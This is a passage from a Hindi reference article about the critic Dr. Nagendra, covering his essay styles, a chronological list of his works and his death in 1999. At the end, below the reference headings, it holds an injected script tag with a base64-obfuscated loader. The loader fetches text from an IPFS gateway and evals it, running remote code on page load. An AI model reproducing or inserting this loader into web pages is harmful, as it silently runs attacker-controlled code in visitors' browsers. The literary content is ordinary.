- पत्रात्मक शैली - 'केशव का आचार्यत्व' नामक रचना में डॉ. नगेन्द्र ने पत्रात्मक शैली का प्रयोग किया गया है। उल्लेखनीय बात तो यह है कि डॉ. विजयेन्द्र स्नातक कृत 'अनुभूति के क्षण' नामक रचना भी सम्पूर्णतः पत्रात्मक शैली की ही निबन्ध रचना है।
- प्रश्नोत्तर शैली - डॉ. नगेन्द्र के लेखन में 'प्रश्नोत्तर शैली' का सौन्दर्य भी लक्षित हो जाता है। इस शैली में निबन्धकार स्वयं ही प्रश्न करता है तथा उसका उत्तर भी स्वयं ही देता है। डॉ. नगेन्द्र कृत 'साहित्य की समीक्षा' शीर्षक निबन्ध को इस शैली का अन्यतम उदाहरण माना जा सकता है।
- संस्मरणात्मक शैली - 'अप्रवासी की यात्राएँ' नामक कृति 'यात्रावृत्त' की विधा की एक प्रमुख कृति है। यह रचना डॉ. नगेन्द्र की संस्मरणात्मक शैली के सौन्दर्य का उदाहरण प्रस्तुत करती है। 'दद्दा- एक महान् व्यक्तित्व' शीर्षक संस्मरणात्मक निबन्ध में इस शैली का व्यवहार लक्षित होता है।
- आत्मसाक्षात्कार की शैली - 'आलोचक का आत्म विश्लेषण' नामक रचना में डॉ. नगेन्द्र का लेख इस शैली का प्रयोग करता हुआ लक्षित होता है। वस्तुतः निबन्ध की विधा में वे ऐसे शैलीकार के रूप में सामने आते हैं, जो रचना में आद्योपान्त अपनी रचना प्रक्रिया पर प्रकाश डालते हुए चलता है।[2]
वर्ष | रचना |
---|---|
1944 | विचार और विवेचन |
1949 | विचार और अनुभूति |
1951 | आधुनिक हिन्दी कविता की मुख्य प्रवृत्तियाँ |
1955 | विचार और विश्लेषण |
1957 | अरस्तू का काव्यशास्त्र |
1961 | अनुसंधान और आलोचना |
1964 | रस-सिद्धांत |
1966 | आलोचक की आस्था |
1969 | आस्था के चरण |
1970 | नयी समीक्षाः नये संदर्भ |
1971 | समस्या और समाधान |
निधन
हिन्दी साहित्य में अपना विशिष्ट योगदान करने वाले साहित्यकार डॉ. नगेन्द्र का निधन 27 अक्टूबर, 1999 को नई दिल्ली में हुआ।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>